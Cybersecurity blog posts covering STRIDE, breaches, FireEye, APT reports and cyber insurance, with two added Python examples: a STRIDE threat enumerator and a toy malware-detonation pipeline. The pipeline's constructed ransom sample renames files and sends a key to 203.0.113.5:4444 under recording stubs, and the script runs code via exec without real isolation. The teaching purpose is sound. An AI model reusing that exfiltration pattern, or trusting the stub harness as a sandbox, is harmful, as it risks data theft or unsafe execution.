Cyber Attacks Typology

Saw this acronym used to describe the types of cyber threats and thought it was useful. It comes from Microsoft's threat-modeling practice, where each letter names a category of threat you check for against every part of a system.


STRIDE


Spoofing – Falsifying an identity (of a user, host, or process) to gain access to systems


Tampering – Making unauthorized changes to data or systems


Repudiation – Denying having performed an action (for example by forging or erasing the record that ties it to you) to escape responsibility or even blame a third party


Information Disclosure – Stealing (exfiltrating) information and disclosing it to unauthorized individuals


Denial of Service – Depriving legitimate users of access to data or systems


Elevation of Privilege – Gaining rights beyond those legitimately granted to an account (e.g. becoming admin or superuser)


Funny-sad enough, these six types of cyber attacks can cause any information security officer to lose their stride. 😉
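The six categories become a checklist when you apply them element by element to a data-flow diagram, the way Microsoft's STRIDE-per-element method does. The script below is an added example, not code from the page: the element kinds and the letters each kind attracts follow the standard STRIDE-per-element table, the control hints are the usual property-to-control pairings, and the sample diagram (a browser, a web app, an orders database and the two flows between them) is constructed for illustration.

```python
"""STRIDE-per-element threat enumeration over a small data-flow diagram (added example)."""
from collections import Counter
from dataclasses import dataclass

# The six STRIDE categories, with the security property each one violates and the
# control family that usually addresses it.
STRIDE = {
    "S": ("Spoofing", "authentication", "strong auth, mutual TLS, signed tokens"),
    "T": ("Tampering", "integrity", "MACs, signatures, input validation"),
    "R": ("Repudiation", "non-repudiation", "signed, append-only audit logs"),
    "I": ("Information Disclosure", "confidentiality", "encryption, authorization checks"),
    "D": ("Denial of Service", "availability", "rate limits, quotas, redundancy"),
    "E": ("Elevation of Privilege", "authorization", "least privilege, input validation"),
}

# STRIDE-per-element: which categories apply to each kind of DFD element.
# (Repudiation on a data store mainly matters when the store is an audit log.)
PER_ELEMENT = {
    "external_entity": "SR",
    "process": "STRIDE",
    "data_store": "TRID",
    "data_flow": "TID",
}


@dataclass(frozen=True)
class Element:
    name: str
    kind: str                       # one of PER_ELEMENT's keys
    crosses_boundary: bool = False  # True for elements that cross a trust boundary


def enumerate_threats(elements):
    """Return one (element name, letter, category, control hint) tuple per applicable
    STRIDE category, listing boundary-crossing elements first (they need scrutiny first)."""
    threats = []
    for e in sorted(elements, key=lambda e: not e.crosses_boundary):
        if e.kind not in PER_ELEMENT:
            raise ValueError(f"unknown element kind {e.kind!r}")
        for letter in PER_ELEMENT[e.kind]:
            category, _property, hint = STRIDE[letter]
            threats.append((e.name, letter, category, hint))
    return threats


def threats_by_category(threats):
    """Count how many elements each STRIDE category touches."""
    return Counter(letter for _, letter, _, _ in threats)


# Constructed sample diagram (not from the page): a browser talking to a web app backed
# by a database; the browser-to-app flow crosses the Internet trust boundary.
SAMPLE_DFD = [
    Element("browser", "external_entity"),
    Element("web app", "process"),
    Element("orders DB", "data_store"),
    Element("browser -> web app", "data_flow", crosses_boundary=True),
    Element("web app -> orders DB", "data_flow"),
]

if __name__ == "__main__":
    for elem, letter, category, hint in enumerate_threats(SAMPLE_DFD):
        print(f"{elem:<24} {letter} {category:<24} mitigate with: {hint}")
    print(threats_by_category(enumerate_threats(SAMPLE_DFD)))
```

The point of the per-element table is what it leaves out: an external entity cannot be the target of an elevation-of-privilege threat, and a data flow cannot be spoofed, only the endpoints can. Running the enumeration on the sample diagram yields 18 threat entries, and the boundary-crossing flow comes out first so the review starts where an attacker would.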


(Source Photo: Andy Blumenthal)

Why Can’t We Keep Our Secrets


Well after the now notorious email scandal and other information security mishaps galore, this advertisement in Washington, DC is really quite the rage. 

“Keeps classified data classified.”


As parents tell their children about keeping private things private:

“If you can’t keep it a secret, then how do you expect the other kids to keep it to themselves?”


There are lots of secrets in DC, but there are also a lot of big mouths, security negligence, and even corruption. 


This gives our adversaries the opportunities they need to get our country’s vital information. 


We work too hard to develop the best intellectual property for national security and our economy, as well as the critical policies for advancing human rights and democracy around the world, to let it just be easy fodder for others to help themselves to. 


Technology won’t close the gap created by certain big mouths and sloppy Joes around town. 


Only vigilant, smart people can protect the nation’s vital information that is the fuel for our success and survival. 😉


(Source Photo: Andy Blumenthal)

Preventing Cyber Disaster


So I liked this ad from Palo Alto Networks on the side of the bus, over the windows:

“Dinosaurs react.
Professionals prevent.”

That’s some very good marketing for a cyber security company.


It’s almost a daily occurrence now to hear about the infiltrations into our networks and the exfiltrations or manipulations of data that are taking place across government and industry.


Just today, another NSA contractor was accused of stealing highly classified computer code.


The day before, Guccifer 2.0 and WikiLeaks released a trove of documents stolen, they claim, from the Clinton Foundation. 


And again, J&J revealed that its insulin pump is vulnerable to hacking, following allegations in August that St. Jude heart devices were subject to life-threatening hacking. 


Certainly, we can’t afford to sit back and wait to react to the next attack…damage control and remediation is much harder than getting out in front of the problem in the first place. 


Prevention and deterrence are really the only solution…keep the hackers out and make sure they know that if they mess with us and our systems, we can identify who they are, find them, and take them out. 


These are the capabilities we need and must employ to dominate the cyber realm. 


In the presidential debates, candidates struggled to articulate how to deal with cybersecurity. 


But this is not a game of cyberopoly; rather, national security, critical infrastructure, vital intellectual property, and our economy are at risk. 


Giving away Internet control and trying to plug leaks after the fact on a sinking cyber ship is no way to manage our vital technology resources.


It’s high time for the equivalent Cold War determination and investment that ensures we win a free and safe cyberspace with all our networks and data intact. 


This is the only way that we don’t go the way of the dinosaurs. 😉


(Source Photo: Andy Blumenthal)

My Ashley Madison

So Ashley Madison is now a well-known adultery website, particularly after hackers stole 37 million records on the site’s participants and released that information to the public.


These tens of millions of users seek companionship for loveless or sexless marriages or perhaps are just plain liars and cheaters–who knows? 


But yikes, now everyone knows!


The Huffington Post reports that divorce lawyers are anticipating a deluge of new clients seeking divorces. 


And BBC reports that two people have already taken their lives in Canada as a result of the release. 


What is incredible as well are the 15,000 people who used their .gov or .mil accounts presumably to hide their infidelity from their spouses, but now are in potentially huge trouble with their government agencies.


I assume that Ashley Madison prided themselves on their discretion in handling their clients’ accounts, but lo and behold, the discretion is for naught, compliments of some very naughty hackers. 


Privacy is becoming a very lonely and meaningless word whether you are faithful or a cheater–it’s all open fodder on the net. 😉


(Source Photo: Andy Blumenthal)

Data 4 Ransom


The future of cybercrime will soon become the almost routine taking of your personal and corporate data as hostage. 


Once the hacker has control of it, with or without exfiltration, they will attach malware to it–like a ticking time bomb.


A simple threat will follow:


“I have your data. Either you pay for your data back unharmed OR your data will become vaporware! You have one hour to decide. If you call the authorities, your data is history.”


So how valuable is your data to you?  


– Your personal information–financial, medical, legal, sentimental things, etc.


– Your corporate information–proprietary trade secrets, customer lists, employee data, more.


How long would it take you to reconstitute if it’s destroyed?  How about if instead it’s sold and used for identity theft or to copy your “secret sauce” (i.e. competitive advantage) or maybe even to surpass you in the marketplace? 


Data is not just inert…it is alive!


Data is not just valuable…often it’s invaluable!


Exposed in our networks or the cloud, data is at risk of theft, distortion, or even ultimate destruction. 


When the time comes, how much will you pay to save your data?


(Source Comic: Andy Blumenthal)

The *S*p*y* Named Snowden


So was Edward Snowden a whistleblower (some even call him a patriot) or one of the most ruthless spies this country has ever known?

An editorial in the Wall Street Journal by Edward Jay Epstein makes a strong case that Snowden was a spy galore, and the whistleblowing was his cover.
What he stole? – 1.7 million documents from the NSA with “only a minute fraction of them have anything to do with civil liberties or whistleblowing.” Instead, the vast majority “were related to our military capabilities, operations, tactics, techniques, and procedures”–otherwise known as the “keys to the kingdom.” Moreover, it seems clear that a “top priority was lists of the computers of U.S. adversaries abroad that the NSA has succeeded in penetrating.”
When he stole them? – Snowden took the Booz Allen Hamilton job as a contractor for NSA in March 2013–this was at the “tail end of his operation.” Moreover, the Foreign Intelligence Surveillance Act (FISA) court order for Verizon to provide metadata on U.S. phone calls for 90 days had only been issued in April 2013. And Snowden told reporter James Rosen in October 2013 that his last job at NSA gave him access to every active operation against the Chinese and “that is why I accepted the position.”
Where did Snowden end up? – First in Hong Kong and then under the protection of the FSB (aka the old KGB) in Russia, which “effectively compromises all the sources and methods” and ties all too nicely with what he stole. A former cabinet official has indicated that the Snowden heist was either Russian espionage, Chinese espionage, or a joint operation.
If Snowden really was a spy as indicated, then the Whistleblowing of domestic surveillance in the U.S. was a most brilliant ploy by his operators to distract our nation from the true nature of the exfiltration and the harm done to our national security. In a way, it falls right in line with Russia’s creative storyline/coverup in taking Crimea in saying that they were only protecting ethnic Russians. Score 2 for Russia!

Are we so easily lied to and manipulated…is public opinion really just jello in the hands of the global spymasters?

We’ve got to be smart enough (i.e. critical thinkers) to interpret the noise in the intelligence signals, political speeches, and news stories to unveil the truth of what is really going on. In advertising, when exposing the truth of products and companies, this is sometimes referred to as culture jamming. Can we apply this to the complicated intrigue of global politics and get past the storyline that is fed to us to expose truth?

It’s high time to outmaneuver those that may seek to manipulate the public (whether from outside or even sometimes from within) with some brilliance of our own–in not believing every snippet that is fed to us and instead looking at the bigger picture of political theater, special interests, and national security to see who is now zinging whom and why. 😉

(Source Photo: Andy Blumenthal)

Safely Detonate That Malware

I like the potential of the FireEye Malware Protection System (MPS).

Unlike traditional signature-based malware protections like antivirus, firewalls, and intrusion prevention systems (IPS), FireEye is an additional security layer that uses a dynamic Multi-Vector Virtual Execution (MVX) engine to detonate suspicious files, web pages, and email attachments in isolated virtual machines, so that even zero-day attacks, for which no signature exists yet, can be caught by what they do rather than by what they look like.

According to Bloomberg Businessweek, Target’s implementation of FireEye detected the malware attack on Nov 30, 2013 and alerted security officials, but allegedly “Target stood by as 40 million credit card numbers–and 70 million addresses, phone numbers, and other pieces of personal information–gushed out of its mainframes” over two weeks!

In fact, FireEye could’ve been set to “automatically delete [the] malware as it’s detected” without human intervention, but Target’s team apparently “turned that function off.”

FireEye works by “creating a parallel computer network on virtual machines,” and before files reach their endpoint, they pass through FireEye’s technology. Here they are “fooled into thinking they’re in real computers,” so the files can be run and their behavior observed, and attacks spotted in safe “detonation chambers.”

Target may have been way off target in the way they bungled their security breach, but using FireEye properly, it is good to know that attacks like this potentially can be thwarted in the future. 😉
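The pipeline the passage describes is execute, observe, decide, act: the sample is run, its behavior is recorded, a verdict is derived from behavior rather than from a signature, and a policy setting decides whether a bad verdict quarantines the sample automatically or only raises an alert. The script below is an added example of that shape, not FireEye’s code and not from the page. It runs the sample in-process by swapping `open()` and `socket.socket` for recording stubs, which is emphatically not an isolation boundary (a real detonation chamber runs the sample in a disposable virtual machine); the suspicious-suffix list, the scoring thresholds and the two sample programs are all constructed assumptions for illustration.

```python
"""Toy detonation pipeline: execute -> observe -> verdict -> policy (added example)."""
import builtins
import contextlib
import io
import socket
from dataclasses import dataclass, field

SUSPICIOUS_SUFFIXES = (".locked", ".enc", ".crypt")  # assumption: ransomware-style renames


@dataclass
class Observation:
    file_writes: list = field(default_factory=list)  # paths the sample tried to write
    connections: list = field(default_factory=list)  # (host, port) it tried to reach
    sent: list = field(default_factory=list)         # payloads it tried to send out
    errors: list = field(default_factory=list)       # exceptions the sample raised


@contextlib.contextmanager
def instrumented(obs):
    """Replace open() and socket.socket with recording stubs for the duration.
    NOT a sandbox: a hostile sample could still reach os.* directly. Illustration only."""
    real_open, real_socket = builtins.open, socket.socket

    def fake_open(path, mode="r", *args, **kwargs):
        if any(c in mode for c in "wax+"):
            obs.file_writes.append(str(path))
            return io.BytesIO() if "b" in mode else io.StringIO()  # divert, never touch disk
        return real_open(path, mode, *args, **kwargs)

    class FakeSocket:
        def __init__(self, *args, **kwargs):
            pass
        def connect(self, address):
            obs.connections.append(tuple(address))  # record; nothing leaves the host
        def sendall(self, data):
            obs.sent.append(bytes(data))
        send = sendall
        def recv(self, n):
            return b""
        def close(self):
            pass

    builtins.open, socket.socket = fake_open, FakeSocket
    try:
        yield obs
    finally:
        builtins.open, socket.socket = real_open, real_socket


def detonate(sample_source):
    """Run sample_source (Python text standing in for a file or attachment) under instrumentation."""
    obs = Observation()
    with instrumented(obs):
        try:
            exec(compile(sample_source, "<sample>", "exec"), {"__name__": "__sample__"})
        except Exception as exc:  # a crashing sample is still a data point
            obs.errors.append(repr(exc))
    return obs


def verdict(obs):
    """Behavior-based verdict: the bytes of the sample are never matched against a signature."""
    score = 0
    if sum(p.endswith(SUSPICIOUS_SUFFIXES) for p in obs.file_writes) >= 3:
        score += 2  # mass write of encrypted-looking files
    if obs.connections:
        score += 1  # phones home...
        if obs.sent:
            score += 1  # ...and uploads something
    return "malicious" if score >= 3 else "suspicious" if score else "clean"


def apply_policy(verdict_label, auto_block):
    """The setting the page describes: quarantine automatically, or only alert a human."""
    if verdict_label == "malicious":
        return "quarantined" if auto_block else "alert-only"
    return "delivered"


# Constructed sample (not real malware): renames four files as if encrypted, then sends a key out.
RANSOM_SAMPLE = r'''
import socket
for i in range(4):
    with open(f"doc{i}.txt.locked", "w") as f:
        f.write("ciphertext")
s = socket.socket()
s.connect(("203.0.113.5", 4444))
s.sendall(b"key=0123")
s.close()
'''

BENIGN_SAMPLE = "total = sum(range(10))"

if __name__ == "__main__":
    for label, src in (("ransom", RANSOM_SAMPLE), ("benign", BENIGN_SAMPLE)):
        v = verdict(detonate(src))
        print(label, v, "->", apply_policy(v, True), "/", apply_policy(v, False))
```

With the auto-block flag on, the ransom sample is quarantined before delivery; with it off, the very same verdict produces only an alert and the file is left for a human to act on, which is the configuration difference the Target account above turns on.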

[Note: this is not an endorsement of any product or vendor]

We’re Giving It All Away

Nice little video from Mandiant on “The anatomy of a cyber attack.”

Despite the typical firewalls, antivirus, and intrusion detection systems, cyber attacks can and do penetrate your systems.

This happens through social engineering (including phishing attempts), automated spam, and zero-day exploits.

Once inside your network, the cyber attacker takes command and control of your computers, surveys your assets, steals user names and passwords, hijacks programs, and accesses valuable intellectual property.

Mandiant performs security incident response management (detecting breaches, containing them, and helping recovery efforts), and they are known for their report “APT1” (2013) exposing an alleged significant government-sponsored cyber espionage group that they state “has systematically stolen hundreds of terabytes of data from at least 141 organizations.”

Another fascinating report on a similar topic of advanced persistent threats was done by McAfee on Operation Shady RAT (2011), which reveals over 70 organizations (governments, commercial entities, and more) that were targeted over 5 years and had terabytes of information siphoned off.

The overall risk from cyber espionage is high and the McAfee report states:

– “Every company in every conceivable industry with significant size and valuable intellectual property and trade secrets has been compromised (or will be shortly), with the great majority of the victims rarely discovering the intrusion or its impact.”

– “What we have witnessed…has been nothing short of a historically unprecedented transfer of [intellectual] wealth – closely guarded national secrets…disappeared in the ever-growing electronic archives of dogged adversaries.”

In short we can’t keep a secret–we’re putting endless gobs and gobs of our information online and are not adequately protecting it in cyberspace, with the result that our adversaries are able to access, exfiltrate, disclose, modify, or destroy it.

In short, we’re giving it all away – why?

Insuring Against Cyber Attacks


More and more, our technology is at risk of a cyber attack.

In fact, just today the Wall Street Journal reported that Iran has hacked into the Navy’s unclassified network.

While we can fix the computers that were attacked, the damage done in terms of data exfiltration and malware infiltration is another matter.

To fix the computers, we can wipe them, swap out the drives, or actually replace the whole system.

But the security breaches still often impose lasting damage, since you can’t get the lost data or privacy information back or as they say “put the genie back in the bottle.”

Also, you aren’t always aware of hidden malware that can lie dormant, like a trojan horse, nor can you immediately contain spreading malware, especially when it relies on a zero-day exploit for which no patch or signature yet exists.

According to Federal Times, on top of more traditional IT security precautions (firewalls, antivirus, network scanning tools, security settings, etc.), many organizations are taking out cybersecurity insurance policies.

With insurance coverage, you transfer the risk of cybersecurity penetrations to cover the costs of compromised data and provide for things like “breach notification to victims, legal costs and forensics, and investigative costs to remedy the breach.”

Unfortunately, because there is little actuarial data for calculating risks, catastrophic events such as “cyber espionage and attacks against SCADA industrial control systems” are usually not covered.

DHS has a section on their website that promotes cybersecurity insurance where they state that the Department of Commerce views cybersecurity insurance as an “effective, market-driven way of increasing cybersecurity,” because it promotes preventive measures and best practices in order to lower insurance premiums and limits company losses from an attack.

Moreover, according to the DHS Cybersecurity Insurance Workshop Readout Report (November 2012), cybersecurity insurance, or risk transfer, is the fourth leg of a comprehensive risk management framework, alongside risk acceptance, risk mitigation, and risk avoidance.

I really like the idea of cybersecurity insurance to help protect organizations from the impact of cybersecurity attacks and for promoting sound cybersecurity practices to begin with.

With cyber attacks, like with other catastrophes (fire, flood, accident, illness, and so on), we will never be able to fully eliminate the risks, but we can prepare ourselves by taking out insurance to help cover the costs of reconstituting and recovery.

Buying insurance for cybersecurity is not capitulating our security, but rather adding one more layer of constructive defense. 😉

(Source Photo: Andy Blumenthal)